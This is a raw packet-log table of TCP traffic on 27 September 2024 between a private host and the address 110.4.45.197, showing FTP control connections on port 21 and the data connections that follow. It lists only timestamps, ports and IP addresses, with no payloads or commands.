Sep 27, 2024 13:12:39.060868979 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060894966 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060920000 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060965061 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060991049 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.065968990 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066090107 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066117048 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066143990 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066175938 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066422939 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.066474915 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.244476080 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.521429062 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.525985003 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.531059027 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531162024 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531189919 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531217098 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531243086 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531292915 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531297922 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.531321049 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531348944 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531359911 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.531377077 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531415939 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.531445026 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.531464100 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.531615019 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536489010 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536515951 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536561966 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536565065 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536590099 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536636114 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536645889 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536673069 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536689043 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536720037 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536746025 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536776066 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536814928 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536839962 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.536842108 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536874056 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536942959 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.536989927 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.542032003 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.542125940 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.542567015 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.544456959 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.712356091 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.848197937 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:40.032361984 CEST | 49775 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:40.037781954 CEST | 21 | 49775 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:40.040584087 CEST | 49775 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:40.040584087 CEST | 49775 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:40.046258926 CEST | 21 | 49775 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:40.052349091 CEST | 49775 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:40.056344032 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:40.469153881 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:40.579972029 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:45.103346109 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:45.108381987 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:45.459942102 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:45.461419106 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:45.466389894 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:45.467087030 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:45.467314959 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:45.472197056 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.360636950 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.360892057 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.365973949 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366004944 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366036892 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366038084 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366053104 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366066933 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366089106 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366113901 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366158962 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366175890 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366329908 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366380930 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366386890 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366406918 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366429090 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366437912 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366455078 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366487026 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.366503000 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.366556883 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371115923 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371144056 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371170044 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371170044 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371186972 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371220112 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371220112 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371248007 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371274948 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371280909 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371303082 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371309996 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371330976 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371341944 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371367931 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371390104 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371445894 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371478081 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371494055 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371504068 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.371531010 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.371575117 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376236916 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376451015 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376498938 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376528025 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376559019 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376605034 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376635075 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376678944 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.376708031 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.377135038 CEST | 55768 | 49776 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:46.377182961 CEST | 49776 | 55768 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:46.467490911 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:47.265567064 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:47.318897963 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:52.298134089 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:52.303175926 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:52.303256989 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:53.126218081 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:53.126368999 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:53.132963896 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:53.454895973 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:53.456473112 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:53.462038994 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:53.820796013 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:53.824496984 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:53.829380035 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.150491953 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.152523041 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:54.157500029 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.480330944 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.480482101 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:54.486978054 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.806366920 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:54.806555033 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:54.811742067 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.133074045 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.133421898 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.138619900 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.138688087 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.138752937 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.143568039 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.714776993 CEST | 49779 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.719839096 CEST | 21 | 49779 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.720567942 CEST | 49779 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.720567942 CEST | 49779 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:55.725646973 CEST | 21 | 49779 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:55.731033087 CEST | 49779 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.066729069 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.071171999 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.076201916 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076231003 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076256990 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076370001 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076397896 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076401949 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.076445103 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076457977 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.076472044 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076502085 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.076549053 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076575041 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076584101 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.076605082 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.076725006 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081594944 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081624031 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081671000 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081698895 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081724882 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081751108 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081777096 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081778049 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081798077 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081825018 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081836939 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081851006 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081873894 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081907034 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.081923008 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.081984043 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.082031012 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.082058907 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.082081079 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.082916975 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.086818933 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.086847067 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.086941004 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.086987972 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087018013 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087100029 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087146044 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087172031 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087218046 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087244034 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.087830067 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.088073015 CEST | 58620 | 49778 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:56.094624996 CEST | 49778 | 58620 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.156761885 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:56.997684002 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:57.115677118 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:57.608388901 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:57.613449097 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:57.973038912 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:57.976418018 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:57.981611013 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:57.981709003 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:57.981863976 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:57.986726999 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.811820030 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.812227964 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817228079 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817259073 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817286968 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817336082 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817394972 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817423105 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817450047 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817456961 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817481995 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817507029 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817531109 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817537069 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817564011 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817590952 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817620993 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.817627907 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.817706108 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822483063 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822547913 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822565079 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822613001 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822617054 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822640896 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822666883 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822668076 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822695017 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822701931 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822731018 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822757006 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822765112 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822793007 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822839975 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822855949 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822866917 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.822895050 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822920084 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:58.822979927 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.823007107 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.827539921 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.827780008 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.827832937 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.827999115 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828028917 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828079939 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828107119 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828152895 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828177929 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:58.828376055 CEST | 57406 | 49780 | 110.4.45.197 | 192.168.2.4 |
